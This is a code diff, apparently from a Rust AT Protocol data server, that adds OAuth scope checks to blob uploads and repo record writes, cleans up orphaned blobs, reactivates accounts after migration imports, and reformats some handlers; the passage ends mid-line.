··· 62 } else { 63 match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 64 Ok(user) => { 65 + let mime_type_for_check = headers 66 + .get("content-type") 67 + .and_then(|h| h.to_str().ok()) 68 + .unwrap_or("application/octet-stream"); 69 + if let Err(e) = crate::auth::scope_check::check_blob_scope( 70 + user.is_oauth, 71 + user.scope.as_deref(), 72 + mime_type_for_check, 73 + ) { 74 + return e; 75 + } 76 let deactivated = sqlx::query_scalar!( 77 "SELECT deactivated_at FROM users WHERE did = $1", 78 user.did ··· 182 .blob_store 183 .put_bytes(&storage_key, bytes::Bytes::from(data)) 184 .await 185 + { 186 + error!("Failed to upload blob to storage: {:?}", e); 187 + return ( 188 + StatusCode::INTERNAL_SERVER_ERROR, 189 + Json(json!({"error": "InternalError", "message": "Failed to store blob"})), 190 + ) 191 + .into_response(); 192 + } 193 if let Err(e) = tx.commit().await { 194 error!("Failed to commit blob transaction: {:?}", e); 195 + if was_inserted && let Err(cleanup_err) = state.blob_store.delete(&storage_key).await { 196 + error!( 197 + "Failed to cleanup orphaned blob {}: {:?}", 198 + storage_key, cleanup_err 199 + ); 200 + } 201 return ( 202 StatusCode::INTERNAL_SERVER_ERROR, 203 Json(json!({"error": "InternalError"})), ··· 241 if let Some(obj) = val.as_object() { 242 if let Some(type_val) = obj.get("$type") 243 && type_val == "blob" 244 + && let Some(r) = obj.get("ref") 245 + && let Some(link) = r.get("$link") 246 + && let Some(s) = link.as_str() 247 + { 248 + blobs.push(s.to_string()); 249 + } 250 for (_, v) in obj { 251 find_blobs(v, blobs); 252 }
+30 -5
src/api/repo/import.rs
··· 53 Some(t) => t, 54 None => return ApiError::AuthenticationRequired.into_response(), 55 }; 56 - let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 57 - Ok(user) => user, 58 - Err(e) => return ApiError::from(e).into_response(), 59 - }; 60 let did = &auth_user.did; 61 let user = match sqlx::query!( 62 - "SELECT id, deactivated_at, takedown_ref FROM users WHERE did = $1", 63 did 64 ) 65 .fetch_optional(&state.db) ··· 317 records.len(), 318 did 319 ); 320 if let Err(e) = sequence_import_event(&state, did, &root.to_string()).await { 321 warn!("Failed to sequence import event: {:?}", e); 322 }
··· 53 Some(t) => t, 54 None => return ApiError::AuthenticationRequired.into_response(), 55 }; 56 + let auth_user = 57 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 58 + Ok(user) => user, 59 + Err(e) => return ApiError::from(e).into_response(), 60 + }; 61 let did = &auth_user.did; 62 let user = match sqlx::query!( 63 + "SELECT id, handle, deactivated_at, takedown_ref FROM users WHERE did = $1", 64 did 65 ) 66 .fetch_optional(&state.db) ··· 318 records.len(), 319 did 320 ); 321 + if is_migration { 322 + if let Err(e) = 323 + sqlx::query!("UPDATE users SET deactivated_at = NULL WHERE did = $1", did) 324 + .execute(&state.db) 325 + .await 326 + { 327 + error!("Failed to reactivate account after import: {:?}", e); 328 + } 329 + let _ = state.cache.delete(&format!("handle:{}", user.handle)).await; 330 + if let Err(e) = crate::api::repo::record::sequence_identity_event( 331 + &state, 332 + did, 333 + Some(&user.handle), 334 + ) 335 + .await 336 + { 337 + warn!("Failed to sequence identity event after import: {:?}", e); 338 + } 339 + if let Err(e) = 340 + crate::api::repo::record::sequence_account_event(&state, did, true, None).await 341 + { 342 + warn!("Failed to sequence account event after import: {:?}", e); 343 + } 344 + } 345 if let Err(e) = sequence_import_event(&state, did, &root.to_string()).await { 346 warn!("Failed to sequence import event: {:?}", e); 347 }
+93 -15
src/api/repo/record/batch.rs
··· 101 .into_response(); 102 } 103 }; 104 - let did = auth_user.did; 105 if input.repo != did { 106 return ( 107 StatusCode::FORBIDDEN, ··· 144 ) 145 .into_response(); 146 } 147 let user_id: uuid::Uuid = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 148 .fetch_optional(&state.db) 149 .await ··· 184 } 185 }; 186 if let Some(swap_commit) = &input.swap_commit 187 - && Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 188 - return ( 189 - StatusCode::CONFLICT, 190 - Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 191 - ) 192 - .into_response(); 193 - } 194 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 195 let commit_bytes = match tracking_store.get(&current_root_cid).await { 196 Ok(Some(b)) => b, ··· 225 value, 226 } => { 227 if input.validate.unwrap_or(true) 228 - && let Err(err_response) = validate_record(value, collection) { 229 - return *err_response; 230 - } 231 let rkey = rkey 232 .clone() 233 .unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string()); ··· 276 value, 277 } => { 278 if input.validate.unwrap_or(true) 279 - && let Err(err_response) = validate_record(value, collection) { 280 - return *err_response; 281 - } 282 let mut record_bytes = Vec::new(); 283 if serde_ipld_dagcbor::to_writer(&mut record_bytes, value).is_err() { 284 return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"}))).into_response(); ··· 353 }; 354 let mut relevant_blocks = std::collections::BTreeMap::new(); 355 for key in &modified_keys { 356 - if mst.blocks_for_path(key, &mut relevant_blocks).await.is_err() { 357 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 358 } 359 if original_mst
··· 101 .into_response(); 102 } 103 }; 104 + let did = auth_user.did.clone(); 105 + let is_oauth = auth_user.is_oauth; 106 + let scope = auth_user.scope; 107 if input.repo != did { 108 return ( 109 StatusCode::FORBIDDEN, ··· 146 ) 147 .into_response(); 148 } 149 + 150 + if is_oauth { 151 + use std::collections::HashSet; 152 + let create_collections: HashSet<&str> = input 153 + .writes 154 + .iter() 155 + .filter_map(|w| { 156 + if let WriteOp::Create { collection, .. } = w { 157 + Some(collection.as_str()) 158 + } else { 159 + None 160 + } 161 + }) 162 + .collect(); 163 + let update_collections: HashSet<&str> = input 164 + .writes 165 + .iter() 166 + .filter_map(|w| { 167 + if let WriteOp::Update { collection, .. } = w { 168 + Some(collection.as_str()) 169 + } else { 170 + None 171 + } 172 + }) 173 + .collect(); 174 + let delete_collections: HashSet<&str> = input 175 + .writes 176 + .iter() 177 + .filter_map(|w| { 178 + if let WriteOp::Delete { collection, .. } = w { 179 + Some(collection.as_str()) 180 + } else { 181 + None 182 + } 183 + }) 184 + .collect(); 185 + 186 + for collection in create_collections { 187 + if let Err(e) = crate::auth::scope_check::check_repo_scope( 188 + is_oauth, 189 + scope.as_deref(), 190 + crate::oauth::RepoAction::Create, 191 + collection, 192 + ) { 193 + return e; 194 + } 195 + } 196 + for collection in update_collections { 197 + if let Err(e) = crate::auth::scope_check::check_repo_scope( 198 + is_oauth, 199 + scope.as_deref(), 200 + crate::oauth::RepoAction::Update, 201 + collection, 202 + ) { 203 + return e; 204 + } 205 + } 206 + for collection in delete_collections { 207 + if let Err(e) = crate::auth::scope_check::check_repo_scope( 208 + is_oauth, 209 + scope.as_deref(), 210 + crate::oauth::RepoAction::Delete, 211 + collection, 212 + ) { 213 + return e; 214 + } 215 + } 216 + } 217 + 218 let user_id: uuid::Uuid = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 219 .fetch_optional(&state.db) 220 .await ··· 255 } 256 }; 257 if let Some(swap_commit) = &input.swap_commit 258 + && Cid::from_str(swap_commit).ok() != Some(current_root_cid) 259 + { 260 + return ( 261 + StatusCode::CONFLICT, 262 + Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 263 + ) 264 + .into_response(); 265 + } 266 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 267 let commit_bytes = match tracking_store.get(&current_root_cid).await { 268 Ok(Some(b)) => b, ··· 297 value, 298 } => { 299 if input.validate.unwrap_or(true) 300 + && let Err(err_response) = validate_record(value, collection) 301 + { 302 + return *err_response; 303 + } 304 let rkey = rkey 305 .clone() 306 .unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string()); ··· 349 value, 350 } => { 351 if input.validate.unwrap_or(true) 352 + && let Err(err_response) = validate_record(value, collection) 353 + { 354 + return *err_response; 355 + } 356 let mut record_bytes = Vec::new(); 357 if serde_ipld_dagcbor::to_writer(&mut record_bytes, value).is_err() { 358 return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"}))).into_response(); ··· 427 }; 428 let mut relevant_blocks = std::collections::BTreeMap::new(); 429 for key in &modified_keys { 430 + if mst 431 + .blocks_for_path(key, &mut relevant_blocks) 432 + .await 433 + .is_err() 434 + { 435 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 436 } 437 if original_mst
+33 -10
src/api/repo/record/delete.rs
··· 34 axum::extract::OriginalUri(uri): axum::extract::OriginalUri, 35 Json(input): Json<DeleteRecordInput>, 36 ) -> Response { 37 - let (did, user_id, current_root_cid) = 38 match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await { 39 Ok(res) => res, 40 Err(err_res) => return err_res, 41 }; 42 if let Some(swap_commit) = &input.swap_commit 43 - && Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 44 - return ( 45 - StatusCode::CONFLICT, 46 - Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 47 - ) 48 - .into_response(); 49 - } 50 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 51 let commit_bytes = match tracking_store.get(&current_root_cid).await { 52 Ok(Some(b)) => b, ··· 115 prev: prev_record_cid, 116 }; 117 let mut relevant_blocks = std::collections::BTreeMap::new(); 118 - if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 119 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 120 } 121 - if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 122 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response(); 123 } 124 let mut written_cids = tracking_store.get_all_relevant_cids();
··· 34 axum::extract::OriginalUri(uri): axum::extract::OriginalUri, 35 Json(input): Json<DeleteRecordInput>, 36 ) -> Response { 37 + let auth = 38 match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await { 39 Ok(res) => res, 40 Err(err_res) => return err_res, 41 }; 42 + 43 + if let Err(e) = crate::auth::scope_check::check_repo_scope( 44 + auth.is_oauth, 45 + auth.scope.as_deref(), 46 + crate::oauth::RepoAction::Delete, 47 + &input.collection, 48 + ) { 49 + return e; 50 + } 51 + 52 + let did = auth.did; 53 + let user_id = auth.user_id; 54 + let current_root_cid = auth.current_root_cid; 55 + 56 if let Some(swap_commit) = &input.swap_commit 57 + && Cid::from_str(swap_commit).ok() != Some(current_root_cid) 58 + { 59 + return ( 60 + StatusCode::CONFLICT, 61 + Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 62 + ) 63 + .into_response(); 64 + } 65 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 66 let commit_bytes = match tracking_store.get(&current_root_cid).await { 67 Ok(Some(b)) => b, ··· 130 prev: prev_record_cid, 131 }; 132 let mut relevant_blocks = std::collections::BTreeMap::new(); 133 + if new_mst 134 + .blocks_for_path(&key, &mut relevant_blocks) 135 + .await 136 + .is_err() 137 + { 138 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 139 } 140 + if mst 141 + .blocks_for_path(&key, &mut relevant_blocks) 142 + .await 143 + .is_err() 144 + { 145 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response(); 146 } 147 let mut written_cids = tracking_store.get_all_relevant_cids();
+19 -19
src/api/repo/record/read.rs
··· 48 let user_id: uuid::Uuid = match user_id_opt { 49 Ok(Some(id)) => id, 50 Ok(None) => { 51 - if let Some(proxy_header) = headers 52 - .get("atproto-proxy") 53 - .and_then(|h| h.to_str().ok()) 54 - { 55 let did = proxy_header.split('#').next().unwrap_or(proxy_header); 56 if let Some(resolved) = state.did_resolver.resolve_did(did).await { 57 let mut url = format!( ··· 84 .header("content-type", "application/json") 85 .body(axum::body::Body::from(body)) 86 .unwrap_or_else(|_| { 87 - (StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response() 88 }); 89 } 90 Err(e) => { ··· 138 } 139 }; 140 if let Some(expected_cid) = &input.cid 141 - && &record_cid_str != expected_cid { 142 - return ( 143 - StatusCode::NOT_FOUND, 144 - Json(json!({"error": "NotFound", "message": "Record CID mismatch"})), 145 - ) 146 - .into_response(); 147 - } 148 let cid = match Cid::from_str(&record_cid_str) { 149 Ok(c) => c, 150 Err(_) => { ··· 326 for (cid, block_opt) in cids.iter().zip(blocks.into_iter()) { 327 if let Some(block) = block_opt 328 && let Some((rkey, cid_str)) = cid_to_rkey.get(cid) 329 - && let Ok(value) = serde_ipld_dagcbor::from_slice::<serde_json::Value>(&block) { 330 - records.push(json!({ 331 - "uri": format!("at://{}/{}/{}", input.repo, input.collection, rkey), 332 - "cid": cid_str, 333 - "value": value 334 - })); 335 - } 336 } 337 Json(ListRecordsOutput { 338 cursor: last_rkey,
··· 48 let user_id: uuid::Uuid = match user_id_opt { 49 Ok(Some(id)) => id, 50 Ok(None) => { 51 + if let Some(proxy_header) = headers.get("atproto-proxy").and_then(|h| h.to_str().ok()) { 52 let did = proxy_header.split('#').next().unwrap_or(proxy_header); 53 if let Some(resolved) = state.did_resolver.resolve_did(did).await { 54 let mut url = format!( ··· 81 .header("content-type", "application/json") 82 .body(axum::body::Body::from(body)) 83 .unwrap_or_else(|_| { 84 + (StatusCode::INTERNAL_SERVER_ERROR, "Internal error") 85 + .into_response() 86 }); 87 } 88 Err(e) => { ··· 136 } 137 }; 138 if let Some(expected_cid) = &input.cid 139 + && &record_cid_str != expected_cid 140 + { 141 + return ( 142 + StatusCode::NOT_FOUND, 143 + Json(json!({"error": "NotFound", "message": "Record CID mismatch"})), 144 + ) 145 + .into_response(); 146 + } 147 let cid = match Cid::from_str(&record_cid_str) { 148 Ok(c) => c, 149 Err(_) => { ··· 325 for (cid, block_opt) in cids.iter().zip(blocks.into_iter()) { 326 if let Some(block) = block_opt 327 && let Some((rkey, cid_str)) = cid_to_rkey.get(cid) 328 + && let Ok(value) = serde_ipld_dagcbor::from_slice::<serde_json::Value>(&block) 329 + { 330 + records.push(json!({ 331 + "uri": format!("at://{}/{}/{}", input.repo, input.collection, rkey), 332 + "cid": cid_str, 333 + "value": value 334 + })); 335 + } 336 } 337 Json(ListRecordsOutput { 338 cursor: last_rkey,
+84 -37
src/api/repo/record/utils.rs
··· 151 match lock_result { 152 Err(e) => { 153 if let Some(db_err) = e.as_database_error() 154 - && db_err.code().as_deref() == Some("55P03") { 155 - return Err( 156 - "ConcurrentModification: Another request is modifying this repo" 157 - .to_string(), 158 - ); 159 - } 160 return Err(format!("Failed to acquire repo lock: {}", e)); 161 } 162 Ok(Some(row)) => { 163 if let Some(expected_root) = &current_root_cid 164 - && row.repo_root_cid != expected_root.to_string() { 165 - return Err( 166 - "ConcurrentModification: Repo has been modified since last read" 167 - .to_string(), 168 - ); 169 - } 170 } 171 Ok(None) => { 172 return Err("Repo not found".to_string()); 173 } 174 } 175 sqlx::query!( 176 "UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2", 177 new_root_cid.to_string(), ··· 289 } 290 }) 291 .collect::<Vec<_>>(); 292 - let event_type = "commit"; 293 - let prev_cid_str = current_root_cid.map(|c| c.to_string()); 294 - let prev_data_cid_str = prev_data_cid.map(|c| c.to_string()); 295 - let seq_row = sqlx::query!( 296 - r#" 297 - INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids, prev_data_cid) 298 - VALUES ($1, $2, $3, $4, $5, $6, $7, $8) 299 - RETURNING seq 300 - "#, 301 - did, 302 - event_type, 303 - new_root_cid.to_string(), 304 - prev_cid_str, 305 - json!(ops_json), 306 - &[] as &[String], 307 - blocks_cids, 308 - prev_data_cid_str, 309 - ) 310 - .fetch_one(&mut *tx) 311 - .await 312 - .map_err(|e| format!("DB Error (repo_seq): {}", e))?; 313 - sqlx::query(&format!("NOTIFY repo_updates, '{}'", seq_row.seq)) 314 - .execute(&mut *tx) 315 .await 316 - .map_err(|e| format!("DB Error (notify): {}", e))?; 317 tx.commit() 318 .await 319 .map_err(|e| format!("Failed to commit transaction: {}", e))?; 320 - let _ = sequence_sync_event(state, did, &new_root_cid.to_string()).await; 321 Ok(CommitResult { 322 commit_cid: new_root_cid, 323 rev: rev_str, ··· 482 .map_err(|e| format!("DB Error (notify): {}", e))?; 483 Ok(seq_row.seq) 484 }
··· 151 match lock_result { 152 Err(e) => { 153 if let Some(db_err) = e.as_database_error() 154 + && db_err.code().as_deref() == Some("55P03") 155 + { 156 + return Err( 157 + "ConcurrentModification: Another request is modifying this repo".to_string(), 158 + ); 159 + } 160 return Err(format!("Failed to acquire repo lock: {}", e)); 161 } 162 Ok(Some(row)) => { 163 if let Some(expected_root) = &current_root_cid 164 + && row.repo_root_cid != expected_root.to_string() 165 + { 166 + return Err( 167 + "ConcurrentModification: Repo has been modified since last read".to_string(), 168 + ); 169 + } 170 } 171 Ok(None) => { 172 return Err("Repo not found".to_string()); 173 } 174 } 175 + let is_account_active = sqlx::query_scalar!( 176 + "SELECT deactivated_at IS NULL FROM users WHERE id = $1", 177 + user_id 178 + ) 179 + .fetch_optional(&mut *tx) 180 + .await 181 + .map_err(|e| format!("Failed to check account status: {}", e))? 182 + .flatten() 183 + .unwrap_or(false); 184 sqlx::query!( 185 "UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2", 186 new_root_cid.to_string(), ··· 298 } 299 }) 300 .collect::<Vec<_>>(); 301 + if is_account_active { 302 + let event_type = "commit"; 303 + let prev_cid_str = current_root_cid.map(|c| c.to_string()); 304 + let prev_data_cid_str = prev_data_cid.map(|c| c.to_string()); 305 + let seq_row = sqlx::query!( 306 + r#" 307 + INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids, prev_data_cid) 308 + VALUES ($1, $2, $3, $4, $5, $6, $7, $8) 309 + RETURNING seq 310 + "#, 311 + did, 312 + event_type, 313 + new_root_cid.to_string(), 314 + prev_cid_str, 315 + json!(ops_json), 316 + &[] as &[String], 317 + blocks_cids, 318 + prev_data_cid_str, 319 + ) 320 + .fetch_one(&mut *tx) 321 .await 322 + .map_err(|e| format!("DB Error (repo_seq): {}", e))?; 323 + sqlx::query(&format!("NOTIFY repo_updates, '{}'", seq_row.seq)) 324 + .execute(&mut *tx) 325 + .await 326 + .map_err(|e| format!("DB Error (notify): {}", e))?; 327 + } 328 tx.commit() 329 .await 330 .map_err(|e| format!("Failed to commit transaction: {}", e))?; 331 + if is_account_active { 332 + let _ = sequence_sync_event(state, did, &new_root_cid.to_string()).await; 333 + } 334 Ok(CommitResult { 335 commit_cid: new_root_cid, 336 rev: rev_str, ··· 495 .map_err(|e| format!("DB Error (notify): {}", e))?; 496 Ok(seq_row.seq) 497 } 498 + 499 + pub async fn sequence_empty_commit_event(state: &AppState, did: &str) -> Result<i64, String> { 500 + let repo_root = sqlx::query_scalar!( 501 + "SELECT r.repo_root_cid FROM repos r JOIN users u ON r.user_id = u.id WHERE u.did = $1", 502 + did 503 + ) 504 + .fetch_optional(&state.db) 505 + .await 506 + .map_err(|e| format!("DB Error fetching repo root: {}", e))? 507 + .ok_or_else(|| "Repo not found".to_string())?; 508 + let ops = serde_json::json!([]); 509 + let blobs: Vec<String> = vec![]; 510 + let blocks_cids: Vec<String> = vec![]; 511 + let seq_row = sqlx::query!( 512 + r#" 513 + INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids) 514 + VALUES ($1, 'commit', $2, $2, $3, $4, $5) 515 + RETURNING seq 516 + "#, 517 + did, 518 + repo_root, 519 + ops, 520 + &blobs, 521 + &blocks_cids 522 + ) 523 + .fetch_one(&state.db) 524 + .await 525 + .map_err(|e| format!("DB Error (repo_seq empty commit): {}", e))?; 526 + sqlx::query(&format!("NOTIFY repo_updates, '{}'", seq_row.seq)) 527 + .execute(&state.db) 528 + .await 529 + .map_err(|e| format!("DB Error (notify): {}", e))?; 530 + Ok(seq_row.seq) 531 + }
+100 -35
src/api/repo/record/write.rs
··· 22 use tracing::error; 23 use uuid::Uuid; 24 25 - pub async fn has_verified_comms_channel( 26 - db: &PgPool, 27 - did: &str, 28 - ) -> Result<bool, sqlx::Error> { 29 let row = sqlx::query( 30 r#" 31 SELECT ··· 52 } 53 } 54 55 pub async fn prepare_repo_write( 56 state: &AppState, 57 headers: &HeaderMap, 58 repo_did: &str, 59 http_method: &str, 60 http_uri: &str, 61 - ) -> Result<(String, Uuid, Cid), Response> { 62 let extracted = crate::auth::extract_auth_token_from_header( 63 headers.get("Authorization").and_then(|h| h.to_str().ok()), 64 ) ··· 69 ) 70 .into_response() 71 })?; 72 - let dpop_proof = headers 73 - .get("DPoP") 74 - .and_then(|h| h.to_str().ok()); 75 let auth_user = crate::auth::validate_token_with_dpop( 76 &state.db, 77 &extracted.token, ··· 163 ) 164 .into_response() 165 })?; 166 - Ok((auth_user.did, user_id, current_root_cid)) 167 } 168 #[derive(Deserialize)] 169 #[allow(dead_code)] ··· 188 axum::extract::OriginalUri(uri): axum::extract::OriginalUri, 189 Json(input): Json<CreateRecordInput>, 190 ) -> Response { 191 - let (did, user_id, current_root_cid) = 192 match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await { 193 Ok(res) => res, 194 Err(err_res) => return err_res, 195 }; 196 if let Some(swap_commit) = &input.swap_commit 197 - && Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 198 - return ( 199 - StatusCode::CONFLICT, 200 - Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 201 - ) 202 - .into_response(); 203 - } 204 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 205 let commit_bytes = match tracking_store.get(&current_root_cid).await { 206 Ok(Some(b)) => b, ··· 234 } 235 }; 236 if input.validate.unwrap_or(true) 237 - && let Err(err_response) = validate_record(&input.record, &input.collection) { 238 - return *err_response; 239 - } 240 let rkey = input 241 .rkey 242 .unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string()); ··· 285 cid: record_cid, 286 }; 287 let mut relevant_blocks = std::collections::BTreeMap::new(); 288 - if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 289 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 290 } 291 - if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 292 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response(); 293 } 294 relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes)); ··· 356 axum::extract::OriginalUri(uri): axum::extract::OriginalUri, 357 Json(input): Json<PutRecordInput>, 358 ) -> Response { 359 - let (did, user_id, current_root_cid) = 360 match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await { 361 Ok(res) => res, 362 Err(err_res) => return err_res, 363 }; 364 if let Some(swap_commit) = &input.swap_commit 365 - && Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 366 - return ( 367 - StatusCode::CONFLICT, 368 - Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 369 - ) 370 - .into_response(); 371 - } 372 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 373 let commit_bytes = match tracking_store.get(&current_root_cid).await { 374 Ok(Some(b)) => b, ··· 403 }; 404 let key = format!("{}/{}", collection_nsid, input.rkey); 405 if input.validate.unwrap_or(true) 406 - && let Err(err_response) = validate_record(&input.record, &input.collection) { 407 - return *err_response; 408 - } 409 if let Some(swap_record_str) = &input.swap_record { 410 let expected_cid = Cid::from_str(swap_record_str).ok(); 411 let actual_cid = mst.get(&key).await.ok().flatten(); ··· 480 } 481 }; 482 let mut relevant_blocks = std::collections::BTreeMap::new(); 483 - if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 484 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 485 } 486 - if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 487 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response(); 488 } 489 relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes));
··· 22 use tracing::error; 23 use uuid::Uuid; 24 25 + pub async fn has_verified_comms_channel(db: &PgPool, did: &str) -> Result<bool, sqlx::Error> { 26 let row = sqlx::query( 27 r#" 28 SELECT ··· 49 } 50 } 51 52 + pub struct RepoWriteAuth { 53 + pub did: String, 54 + pub user_id: Uuid, 55 + pub current_root_cid: Cid, 56 + pub is_oauth: bool, 57 + pub scope: Option<String>, 58 + } 59 + 60 pub async fn prepare_repo_write( 61 state: &AppState, 62 headers: &HeaderMap, 63 repo_did: &str, 64 http_method: &str, 65 http_uri: &str, 66 + ) -> Result<RepoWriteAuth, Response> { 67 let extracted = crate::auth::extract_auth_token_from_header( 68 headers.get("Authorization").and_then(|h| h.to_str().ok()), 69 ) ··· 74 ) 75 .into_response() 76 })?; 77 + let dpop_proof = headers.get("DPoP").and_then(|h| h.to_str().ok()); 78 let auth_user = crate::auth::validate_token_with_dpop( 79 &state.db, 80 &extracted.token, ··· 166 ) 167 .into_response() 168 })?; 169 + Ok(RepoWriteAuth { 170 + did: auth_user.did, 171 + user_id, 172 + current_root_cid, 173 + is_oauth: auth_user.is_oauth, 174 + scope: auth_user.scope, 175 + }) 176 } 177 #[derive(Deserialize)] 178 #[allow(dead_code)] ··· 197 axum::extract::OriginalUri(uri): axum::extract::OriginalUri, 198 Json(input): Json<CreateRecordInput>, 199 ) -> Response { 200 + let auth = 201 match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await { 202 Ok(res) => res, 203 Err(err_res) => return err_res, 204 }; 205 + 206 + if let Err(e) = crate::auth::scope_check::check_repo_scope( 207 + auth.is_oauth, 208 + auth.scope.as_deref(), 209 + crate::oauth::RepoAction::Create, 210 + &input.collection, 211 + ) { 212 + return e; 213 + } 214 + 215 + let did = auth.did; 216 + let user_id = auth.user_id; 217 + let current_root_cid = auth.current_root_cid; 218 + 219 if let Some(swap_commit) = &input.swap_commit 220 + && Cid::from_str(swap_commit).ok() != Some(current_root_cid) 221 + { 222 + return ( 223 + StatusCode::CONFLICT, 224 + Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 225 + ) 226 + .into_response(); 227 + } 228 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 229 let commit_bytes = match tracking_store.get(&current_root_cid).await { 230 Ok(Some(b)) => b, ··· 258 } 259 }; 260 if input.validate.unwrap_or(true) 261 + && let Err(err_response) = validate_record(&input.record, &input.collection) 262 + { 263 + return *err_response; 264 + } 265 let rkey = input 266 .rkey 267 .unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string()); ··· 310 cid: record_cid, 311 }; 312 let mut relevant_blocks = std::collections::BTreeMap::new(); 313 + if new_mst 314 + .blocks_for_path(&key, &mut relevant_blocks) 315 + .await 316 + .is_err() 317 + { 318 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 319 } 320 + if mst 321 + .blocks_for_path(&key, &mut relevant_blocks) 322 + .await 323 + .is_err() 324 + { 325 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response(); 326 } 327 relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes)); ··· 389 axum::extract::OriginalUri(uri): axum::extract::OriginalUri, 390 Json(input): Json<PutRecordInput>, 391 ) -> Response { 392 + let auth = 393 match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await { 394 Ok(res) => res, 395 Err(err_res) => return err_res, 396 }; 397 + 398 + if let Err(e) = crate::auth::scope_check::check_repo_scope( 399 + auth.is_oauth, 400 + auth.scope.as_deref(), 401 + crate::oauth::RepoAction::Create, 402 + &input.collection, 403 + ) { 404 + return e; 405 + } 406 + if let Err(e) = crate::auth::scope_check::check_repo_scope( 407 + auth.is_oauth, 408 + auth.scope.as_deref(), 409 + crate::oauth::RepoAction::Update, 410 + &input.collection, 411 + ) { 412 + return e; 413 + } 414 + 415 + let did = auth.did; 416 + let user_id = auth.user_id; 417 + let current_root_cid = auth.current_root_cid; 418 + 419 if let Some(swap_commit) = &input.swap_commit 420 + && Cid::from_str(swap_commit).ok() != Some(current_root_cid) 421 + { 422 + return ( 423 + StatusCode::CONFLICT, 424 + Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 425 + ) 426 + .into_response(); 427 + } 428 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 429 let commit_bytes = match tracking_store.get(&current_root_cid).await { 430 Ok(Some(b)) => b, ··· 459 }; 460 let key = format!("{}/{}", collection_nsid, input.rkey); 461 if input.validate.unwrap_or(true) 462 + && let Err(err_response) = validate_record(&input.record, &input.collection) 463 + { 464 + return *err_response; 465 + } 466 if let Some(swap_record_str) = &input.swap_record { 467 let expected_cid = Cid::from_str(swap_record_str).ok(); 468 let actual_cid = mst.get(&key).await.ok().flatten(); ··· 537 } 538 }; 539 let mut relevant_blocks = std::collections::BTreeMap::new(); 540 + if new_mst 541 